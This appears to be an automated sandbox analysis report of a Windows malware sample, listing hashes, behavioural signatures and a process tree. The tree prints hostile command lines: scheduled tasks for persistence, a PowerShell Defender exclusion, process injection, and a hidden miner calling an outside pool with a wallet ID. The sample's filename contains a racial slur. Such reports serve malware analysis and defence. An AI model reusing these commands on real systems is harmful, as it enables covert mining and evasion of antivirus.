Analysis
-
max time kernel
95s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220331-en -
submitted
07-04-2022 05:16
Static task
static1
Behavioral task
behavioral1
Sample
BstNiggaStub.exe
Resource
win7-20220331-en
Behavioral task
behavioral2
Sample
BstNiggaStub.exe
Resource
win10v2004-20220331-en
General
-
Target
BstNiggaStub.exe
-
Size
1017KB
-
MD5
6a63a4741f5d8561a08069dab3c9afbc
-
SHA1
4cceb4ccf7a1d488bc7a4b67ced920c7fcbec8a2
-
SHA256
5536d8e31ee96b4cdfbd1a1b485cb13960f01ddf218ee8d17f42f5f02b41d68e
-
SHA512
1afc1ec86a900827257b7fff7f2a598a0b35ef3f489a7ea11fe0d6a130335550ac6032a18e2c425429e06aae52ed89c84697ac9d12b3080cc2ee9b95b9ca9dab
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
Processes:
WindowsFinder.exeWindowsFinder.exeWindowsFinder.exeWindowsFinder.exeWindowsFinder.exepid process 2240 WindowsFinder.exe 4136 WindowsFinder.exe 3196 WindowsFinder.exe 5032 WindowsFinder.exe 4668 WindowsFinder.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
BstNiggaStub.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation BstNiggaStub.exe -
Loads dropped DLL 15 IoCs
Processes:
WindowsFinder.exeWindowsFinder.exeWindowsFinder.exeWindowsFinder.exeWindowsFinder.exepid process 4136 WindowsFinder.exe 4136 WindowsFinder.exe 2240 WindowsFinder.exe 2240 WindowsFinder.exe 2240 WindowsFinder.exe 4136 WindowsFinder.exe 3196 WindowsFinder.exe 3196 WindowsFinder.exe 3196 WindowsFinder.exe 5032 WindowsFinder.exe 5032 WindowsFinder.exe 5032 WindowsFinder.exe 4668 WindowsFinder.exe 4668 WindowsFinder.exe 4668 WindowsFinder.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
BstNiggaStub.exedescription pid process target process PID 4004 set thread context of 4628 4004 BstNiggaStub.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4504 4628 WerFault.exe RegAsm.exe 1824 4004 WerFault.exe BstNiggaStub.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2876 schtasks.exe 2248 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 51 IoCs
Processes:
BstNiggaStub.exepowershell.exepid process 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4420 powershell.exe 4420 powershell.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe 4004 BstNiggaStub.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
BstNiggaStub.exepowershell.exedescription pid process Token: SeDebugPrivilege 4004 BstNiggaStub.exe Token: SeDebugPrivilege 4420 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
BstNiggaStub.exedescription pid process target process PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 4628 4004 BstNiggaStub.exe RegAsm.exe PID 4004 wrote to memory of 448 4004 BstNiggaStub.exe schtasks.exe PID 4004 wrote to memory of 448 4004 BstNiggaStub.exe schtasks.exe PID 4004 wrote to memory of 2876 4004 BstNiggaStub.exe schtasks.exe PID 4004 wrote to memory of 2876 4004 BstNiggaStub.exe schtasks.exe PID 4004 wrote to memory of 2248 4004 BstNiggaStub.exe schtasks.exe PID 4004 wrote to memory of 2248 4004 BstNiggaStub.exe schtasks.exe PID 4004 wrote to memory of 4420 4004 BstNiggaStub.exe powershell.exe PID 4004 wrote to memory of 4420 4004 BstNiggaStub.exe powershell.exe PID 4004 wrote to memory of 2240 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 2240 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 4136 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 4136 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 3196 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 3196 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 5032 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 5032 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 4668 4004 BstNiggaStub.exe WindowsFinder.exe PID 4004 wrote to memory of 4668 4004 BstNiggaStub.exe WindowsFinder.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BstNiggaStub.exe"C:\Users\Admin\AppData\Local\Temp\BstNiggaStub.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:4628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 5763⤵
- Program crash
PID:4504
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /tn WindowsService /f2⤵PID:448
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn WindowsService /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /sc onlogon /rl highest2⤵
- Creates scheduled task(s)
PID:2876
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn WindowsServiceUpload /tr "C:\Users\Admin\AppData\Roaming\Windows Folder\Windows Service.exe" /f /rl highest2⤵
- Creates scheduled task(s)
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Folder'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4420
-
-
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe"C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2240
-
-
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe"C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4136
-
-
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe"C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3196
-
-
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe"C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5032
-
-
C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe"C:\Users\Admin\AppData\Roaming\Windows Folder\Addins\WindowsFinder.exe" -w EQBRanNZsA8KNoHEWSKpN4yahYET0g8dcctSXT0c3cNAfNax -p https://server1.whalestonpool.com -api ":8080"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4668
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4004 -s 26282⤵
- Program crash
PID:1824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4628 -ip 46281⤵PID:488
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 520 -p 4004 -ip 40041⤵PID:756
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD575c82cc70a4a8f9878959edc4e40e067
SHA1b3858343b9e2befcc28fd465fd377da451186033
SHA256534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc
SHA51268e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7
-
Filesize
28KB
MD575c82cc70a4a8f9878959edc4e40e067
SHA1b3858343b9e2befcc28fd465fd377da451186033
SHA256534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc
SHA51268e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7
-
Filesize
28KB
MD575c82cc70a4a8f9878959edc4e40e067
SHA1b3858343b9e2befcc28fd465fd377da451186033
SHA256534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc
SHA51268e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7
-
Filesize
28KB
MD575c82cc70a4a8f9878959edc4e40e067
SHA1b3858343b9e2befcc28fd465fd377da451186033
SHA256534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc
SHA51268e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7
-
Filesize
28KB
MD575c82cc70a4a8f9878959edc4e40e067
SHA1b3858343b9e2befcc28fd465fd377da451186033
SHA256534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc
SHA51268e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7
-
Filesize
28KB
MD575c82cc70a4a8f9878959edc4e40e067
SHA1b3858343b9e2befcc28fd465fd377da451186033
SHA256534f2229e40b543a5a06218e1019a133db817f09735102b0ee3c8573ebcfa6fc
SHA51268e80a79c7f514d52835abe031e33259ba63039a3513d69d714f9dd8711107a7766f7ca18ed3712be57fb16dd97cf4b933a22d7efd14e6df555a7e80493432b7
-
Filesize
6.2MB
MD55b69b37c6acf7203fcef43fb3f1b794d
SHA1538caf62f25dea9d174f02aead4dc846ebadc345
SHA2566fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5
SHA512ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f
-
Filesize
6.2MB
MD55b69b37c6acf7203fcef43fb3f1b794d
SHA1538caf62f25dea9d174f02aead4dc846ebadc345
SHA2566fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5
SHA512ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f
-
Filesize
6.2MB
MD55b69b37c6acf7203fcef43fb3f1b794d
SHA1538caf62f25dea9d174f02aead4dc846ebadc345
SHA2566fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5
SHA512ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f
-
Filesize
6.2MB
MD55b69b37c6acf7203fcef43fb3f1b794d
SHA1538caf62f25dea9d174f02aead4dc846ebadc345
SHA2566fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5
SHA512ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f
-
Filesize
6.2MB
MD55b69b37c6acf7203fcef43fb3f1b794d
SHA1538caf62f25dea9d174f02aead4dc846ebadc345
SHA2566fec5ac27cb10fab24e7068393dd05dc3d811498df175a0999ba4add71791ba5
SHA512ee4e0a86692e82ad0a79707ce0840341bc79cf8be4ee8f2a01012968fc75ffb4625017645cec069dd5e3d7b12060ef747a4d6aa5d1b3461ba0cedea777df814f
-
Filesize
3.3MB
MD532d7e884189e301c3cd4b6993abb283f
SHA1793fa8e8e51c591c520e906061313e8f97287440
SHA2565862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519
SHA512b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b
-
Filesize
3.3MB
MD532d7e884189e301c3cd4b6993abb283f
SHA1793fa8e8e51c591c520e906061313e8f97287440
SHA2565862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519
SHA512b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b
-
Filesize
3.3MB
MD532d7e884189e301c3cd4b6993abb283f
SHA1793fa8e8e51c591c520e906061313e8f97287440
SHA2565862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519
SHA512b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b
-
Filesize
3.3MB
MD532d7e884189e301c3cd4b6993abb283f
SHA1793fa8e8e51c591c520e906061313e8f97287440
SHA2565862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519
SHA512b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b
-
Filesize
3.3MB
MD532d7e884189e301c3cd4b6993abb283f
SHA1793fa8e8e51c591c520e906061313e8f97287440
SHA2565862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519
SHA512b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b
-
Filesize
3.3MB
MD532d7e884189e301c3cd4b6993abb283f
SHA1793fa8e8e51c591c520e906061313e8f97287440
SHA2565862fb9df1dfc0ad0c1fe9034aeb057633828e12fbc00d2b044e364758bf9519
SHA512b64ca1444b94ec324a74efaa3f78e8d3195f60a7364ff5ee1f3f5d27859fc4790d13a780232bb328cb571765abc96caebf275de5573bfc146931fa989a02943b
-
Filesize
3.6MB
MD5703f25116760b08f24401832edb0014f
SHA1631bdb041296c58849648a447afd7046246747a1
SHA256c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558
SHA512566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b
-
Filesize
3.6MB
MD5703f25116760b08f24401832edb0014f
SHA1631bdb041296c58849648a447afd7046246747a1
SHA256c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558
SHA512566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b
-
Filesize
3.6MB
MD5703f25116760b08f24401832edb0014f
SHA1631bdb041296c58849648a447afd7046246747a1
SHA256c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558
SHA512566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b
-
Filesize
3.6MB
MD5703f25116760b08f24401832edb0014f
SHA1631bdb041296c58849648a447afd7046246747a1
SHA256c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558
SHA512566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b
-
Filesize
3.6MB
MD5703f25116760b08f24401832edb0014f
SHA1631bdb041296c58849648a447afd7046246747a1
SHA256c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558
SHA512566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b
-
Filesize
3.6MB
MD5703f25116760b08f24401832edb0014f
SHA1631bdb041296c58849648a447afd7046246747a1
SHA256c6c5e99afcd785b64058f1180f26b3f44b616d056f68990659d077666456f558
SHA512566dcab034bc241d81e9950bf7f283668d587cdd10c3d9ce89cea7baa3281d947827e2bd15f0c22bafbc3bae2c0a290620b7de9d2187ac04dcc61fde2f84ab4b